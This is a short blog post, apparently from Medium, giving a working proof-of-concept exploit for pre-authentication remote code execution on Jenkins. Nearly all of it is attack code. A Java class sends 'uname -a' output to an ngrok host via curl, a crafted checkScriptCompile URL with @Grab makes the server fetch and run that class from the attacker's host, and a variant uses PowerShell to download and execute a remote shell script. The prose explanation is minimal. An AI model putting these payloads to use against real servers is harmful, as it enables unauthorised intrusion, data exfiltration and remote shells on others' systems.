Jenkins RCE PoC or simple pre-auth remote code execution on the Server.

Valeriy Shevchenko
Aug 19 · 4 min read
http://example.com/jenkins/securityRealm/user/admin/
Jenkins User Id: admin
public class Orange {
public Orange(){
try {
String payload = "uname -a | curl -d @- http://myservertunnel.ngrok.io/";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}
}
uname -a | curl -d @- http://myservertunnel.ngrok.io/
javac -target 1.8 Orange.java
./Orange.java
./Orange.class
./META-INF
./META-INF/services
./META-INF/services/org.codehaus.groovy.plugins.Runners
Just screenshot of all required steps to make your POC (without -target 1.8)
http://example.com/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)
@GrabResolver(name='orange.tw', root='http://myservertunnel.ngrok.io/')
@Grab(group='tw.orange', module='poc', version='1')
import Orange;
{
"column": 0,
"line": 0,
"message": "",
"status": "success"
}
public class Orange {
public Orange(){
try {
String payload = "powershell iex(new-object net.webclient).downloadstring('http://yourserver.com/shell.ps1')";
String[] cmds = {"cmd", "/c", payload};
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) { }
}
}

References

Valeriy Shevchenko

Written by

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade